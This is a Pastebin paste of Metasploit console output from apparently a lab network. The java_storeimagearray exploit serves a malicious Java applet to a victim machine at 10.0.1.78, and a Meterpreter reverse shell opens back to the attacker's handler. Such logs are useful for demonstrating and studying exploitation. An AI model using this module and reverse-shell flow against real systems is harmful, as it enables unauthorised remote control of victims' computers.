Advertisement
Guest User

Untitled

a guest
Aug 16th, 2013
1,722
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.99 KB | None | 0 0
  1. msf exploit(java_storeimagearray) > run
  2. [*] Exploit running as background job.
  3.  
  4. [*] Started reverse handler on 10.0.1.76:4444
  5. [*] Using URL: http://0.0.0.0:8080/vMKJ2Jtxsh1Jj0e
  6. [*] Local IP: http://10.0.1.76:8080/vMKJ2Jtxsh1Jj0e
  7. [*] Server started.
  8. msf exploit(java_storeimagearray) > [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e
  9. [*] 10.0.1.78 java_storeimagearray - Sending redirect...
  10. [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e/
  11. [*] 10.0.1.78 java_storeimagearray - Sending HTML...
  12. [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e/Itfnu.jar
  13. [*] 10.0.1.78 java_storeimagearray - Sending .jar file...
  14. [!] 10.0.1.78 java_storeimagearray - Requesting: /vMKJ2Jtxsh1Jj0e/Itfnu.jar
  15. [*] 10.0.1.78 java_storeimagearray - Sending .jar file...
  16. [*] Sending stage (30355 bytes) to 10.0.1.78
  17. [*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.78:2370) at 2013-08-16 01:28:20 -0500
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement